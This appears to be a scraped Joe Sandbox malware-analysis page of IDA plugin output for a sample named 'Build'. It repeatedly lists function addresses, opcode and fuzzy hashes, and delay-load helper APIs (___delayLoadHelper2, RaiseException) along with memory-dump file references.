Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7d77f057fdf8906a7554b93524c1292d5b03d2e3ffcfdc4bd7174e0f87584893
Instruction ID: 54c4f84ceb7ac7b7680da0e072009a26b6d65acb3962f3ac84cd911bd90479c6
Opcode Fuzzy Hash: 7d77f057fdf8906a7554b93524c1292d5b03d2e3ffcfdc4bd7174e0f87584893
Instruction Fuzzy Hash: C4B0128935C602AC328F71599D02D7F011CC0C0B1033186BEF818C4040F4405C4D0731

Function 003806FB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4db3075e8ad26f004aa1e0dd93ca2100b60f86c11d955fbaa8e6c99fd90548d8
Instruction ID: dda49c34d7343e9c8b48065f4d16a8ffe1832d66068863c1ae95ef8dfc031893
Opcode Fuzzy Hash: 4db3075e8ad26f004aa1e0dd93ca2100b60f86c11d955fbaa8e6c99fd90548d8
Instruction Fuzzy Hash: 10B0129A35C202AC328F71585C02D3F010CC0C0B10331C47EF808C4040F4405C4C0731

Function 003806F1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fdfeb3208041168942946bb39c179ec0121c235e590a3ea9a100e08bf3ee1413
Instruction ID: d114d3a976ef67a900966342b95b55e171d22037c62aa8eccbd7631df27a3aef
Opcode Fuzzy Hash: fdfeb3208041168942946bb39c179ec0121c235e590a3ea9a100e08bf3ee1413
Instruction Fuzzy Hash: C9B0128935C202AC32CF71A85C02D3F010CD0C0B10331C87EF409C4240F4405C4C0731

Function 003806E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: af89573d62ba65b07e3871af5a27d59bcbcb35c07c45aaaa309f42c8386c59b4
Instruction ID: b5b137e106d869d4afaacc980aeae52f9d0e6526594ad0875197c48672a6ce9b
Opcode Fuzzy Hash: af89573d62ba65b07e3871af5a27d59bcbcb35c07c45aaaa309f42c8386c59b4
Instruction Fuzzy Hash: 14B0128935C202AC32CF71595D02D3F010CC0C0B10331C4BEF818C4240F4405C4D1731

Function 003806DD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1cfa1804c5b8c5ad70a5d838a7243a28bc76b048074139b1c32e559039aaa807
Instruction ID: 4b0b332a1398379cc16df8e1a66f15daea14b0eb27da84bd5040dadb06406932
Opcode Fuzzy Hash: 1cfa1804c5b8c5ad70a5d838a7243a28bc76b048074139b1c32e559039aaa807
Instruction Fuzzy Hash: 26B09289258242AC32CF71595C02D3A010CC0C0B10321856AF408C4240A4405C8C0631

Function 003806D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e0c6f0fe59ad4b94ccb789f32dde9ce33200c0634888945a8eb2036eb31db54e
Instruction ID: be6ecb7ae01d680816fea358286a2322069256a0a1226e2f5a620e43bcf22b4c
Opcode Fuzzy Hash: e0c6f0fe59ad4b94ccb789f32dde9ce33200c0634888945a8eb2036eb31db54e
Instruction Fuzzy Hash: D2B09289258202AC328F75585C02D3A010CC0C0B10321C46AF808C4240A4405C4C0631

Function 003806C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4406c5edb53ae92badbc4392f99a35aa66acbb6f8a10031bf09cb38ec8a0592a
Instruction ID: 71ee8726e5bd85f2c86f0fb43bce171635530c1218d4078f9100c6fafdafd2e9
Opcode Fuzzy Hash: 4406c5edb53ae92badbc4392f99a35aa66acbb6f8a10031bf09cb38ec8a0592a
Instruction Fuzzy Hash: CDB012CD35C302AC329F71585C42D3F010CD0C0B10331847EF408C4140F4405C4C0731

Function 0038072D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a9fb53d1decf07cf283d8247967ebe9db2d54375a00a8402e65e29ab4d864648
Instruction ID: bf8c1b5fde4b1c6cc671446446bb202b85c1c9ae4b1a8d68a49eac12b8d5f056
Opcode Fuzzy Hash: a9fb53d1decf07cf283d8247967ebe9db2d54375a00a8402e65e29ab4d864648
Instruction Fuzzy Hash: AAB0129935D302AC33CF72595C02D3F010CC0C0B10331857EF408C4040F4409C8C0731

Function 00380719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4bbf29bb04f7769081403ae271bc75fcde6952c47a9a379394ab95fd17ec50a8
Instruction ID: 6aff04bf2db621fd79f669ebe4983546bbffc86650438f2a49de615868a3bbfb
Opcode Fuzzy Hash: 4bbf29bb04f7769081403ae271bc75fcde6952c47a9a379394ab95fd17ec50a8
Instruction Fuzzy Hash: 1AB0129935C202AC328F71595C02D3F010CD0C0B1033184BEF408C4040F4405C4C0731

Function 0038070F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0b03db89fee3677748c7a618ff3ca40075446c80788783758376d2fa72c4c80a
Instruction ID: 877e7e71267eeafe0e30dfecc7eedff36f2116e800e06ae1c5c4dfa77962c03b
Opcode Fuzzy Hash: 0b03db89fee3677748c7a618ff3ca40075446c80788783758376d2fa72c4c80a
Instruction Fuzzy Hash: 2AB0129935C202AC328F71595D02D3F010CC0C0B1033184BEF818C4040F4405D4D0731

Function 0038075F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038068E

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ddba6eabfd24f3e8678ae1daa355292be1c3902d99d4d8619bcf1f5102d37e92
Instruction ID: 64affbc039d47b98512a5a5d86d5a2dac1fcf56811417a3220de8f2076a9ed2b
Opcode Fuzzy Hash: ddba6eabfd24f3e8678ae1daa355292be1c3902d99d4d8619bcf1f5102d37e92
Instruction Fuzzy Hash: CAB012D935C202AC328F71595D02D3F018CC0C0B1033184BEF818C4040F4406C4D0731

Function 003808F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 63a6d9afba599df9935d401068fc144964ec2128b12f2d1d88e71d856c0da3ad
Instruction ID: 7f0d3078a754b516ee7a424079cb51305ce98912e029fea43dbfd1744f4d5b68
Opcode Fuzzy Hash: 63a6d9afba599df9935d401068fc144964ec2128b12f2d1d88e71d856c0da3ad
Instruction Fuzzy Hash: C1B0128637C211AC328F71589C02E7A120CD0C0B11330866FF408C4041E4401C8C0731

Function 003808CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 832b8e70390556bd4f1fc35bb8fd25f19489a3c498c7ddd5adb4970e942fc93c
Instruction ID: 99bd36d22acb25cd2cb218f663211f20e0fff0f630a8458a93c23c63470b5db7
Opcode Fuzzy Hash: 832b8e70390556bd4f1fc35bb8fd25f19489a3c498c7ddd5adb4970e942fc93c
Instruction Fuzzy Hash: B7B012C63AC311AC329F71585C02E3A120CD0C0B11330846EF808C4141E4401C8C0731

Function 003808C4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003808A7

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f43d8e1451deab9a132a296aeec14c75328918b24fd0a700618abf93b2ea7c73
Instruction ID: ecdcdb81f13445c8f1b108345a749b11a8f23a7a1a878ad41edf8a4ac95d8514
Opcode Fuzzy Hash: f43d8e1451deab9a132a296aeec14c75328918b24fd0a700618abf93b2ea7c73
Instruction Fuzzy Hash: F1B0128636C311AC379F71595C02D3A121CD0C0B11330856EF808C4181E4401CCC4731

Function 003809EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1b6892bcc318c4b4b184b24d74649e5cd7e61067bd7bee32b306d1ee87cd28a6
Instruction ID: 7adcf2142821244a85c918c318cea66ae413b0f1f5a59c27d02b6388b2e3a659
Opcode Fuzzy Hash: 1b6892bcc318c4b4b184b24d74649e5cd7e61067bd7bee32b306d1ee87cd28a6
Instruction Fuzzy Hash: F9B012CB39C201BD364F3158ED02C77010CC8C0B28330C5BEF411D4042A8511C0D0331

Function 00380A23 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 820754fe19a9a51ccdf17966e25312f226c1ddc31ad6ba6312459edad149f999
Instruction ID: 998fb9edbcaa408307ab5011a6fb72232bf68dc47ca12e265590be1e40c0bea2
Opcode Fuzzy Hash: 820754fe19a9a51ccdf17966e25312f226c1ddc31ad6ba6312459edad149f999
Instruction Fuzzy Hash: CCB012C739C200ED368F7158EC02D77011CC0C0B10330C5BEF805C5041E4401C0C0331

Function 00380A0F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 003809FC

Part of subcall function 00380D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00380DAD
Part of subcall function 00380D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00380DBE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
